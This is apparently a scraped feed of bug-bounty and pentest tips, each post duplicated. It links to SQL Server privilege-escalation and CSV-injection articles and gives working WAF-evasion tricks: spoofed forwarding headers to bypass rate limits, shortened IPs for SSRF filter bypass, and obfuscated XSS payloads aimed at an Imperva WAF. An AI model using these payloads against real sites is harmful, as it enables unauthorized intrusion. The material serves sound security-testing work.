Hacking SQL Server Stored Procedures
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
1: (un)Trustworthy Databases
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-1-untrustworthy-databases/
2: User Impersonation
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-2-user-impersonation/
3: SQL Injection
https://blog.netspi.com/hacking-sql-server-stored-procedures-part-3-sqli-and-user-impersonation/
4: Enumerating Domain Accounts
https://blog.netspi.com/hacking-sql-server-procedures-part-4-enumerating-domain-accounts/
#infosec #pentest #redteam
NetSPI
Hacking SQL Server Stored Procedures – Part 1: (un)Trustworthy Databases
In this blog I’ll show how database users commonly created for web applications can be used to escalate privileges in SQL Server when database ownership is poorly configured.
CSV Injection: http://ghostlulz.com/csv-injection/
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
ClickJacking: http://ghostlulz.com/clickjacking/
Exposed Firebase DB: http://ghostlulz.com/google-exposed-firebase-database/
Config Files: http://ghostlulz.com/exposed-log-and-configuration-files/
Kubernetes API : http://ghostlulz.com/exposed-kubernetes-api/
#bugbounty #bugbountytips #bugbountytip #redteam #pentest #infosec #xss
Ghostlulz
CSV Injection - Ghostlulz
How to use CSV injection AKA Formula injection to embed a malicous payload into to spread sheet.
Rate limit bypass:
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Add header/s with request
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwared-Host: IP
If bypass successful, & after a while blocking request again. Increment the last octate
#infosec #bugbounty
Bugbounty tips#3
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
Short IP addrs by dropping zeroes. To bypasses WAF filters for SSRF, open-redirect, whr any IP got blocked
Exmpls:
http://1.0.0.1 → http://1.1
http://192.168.0.1 → http://192.168.1
#infosec #SSRF #bugbountytip #bypass #WAF #bugbountytips #hackerone #hackers
please note and share;
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
blocked:
onauxclick=confirm(2)
bypassed:
onauxclick=[2].some(confirm)
#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking
Imperva WAF Bypass for XSS;
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">
- without parentheses, 'alert', 'document.domain' , 'window' , space
#BugBounty #BugBountyTip #WAF #infosec
Grep hostnames from ssl certificate
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty
echo | openssl s_client -connect example\.com | openssl x509 -noout -text | grep DNS
#infosec #pentest #bugbounty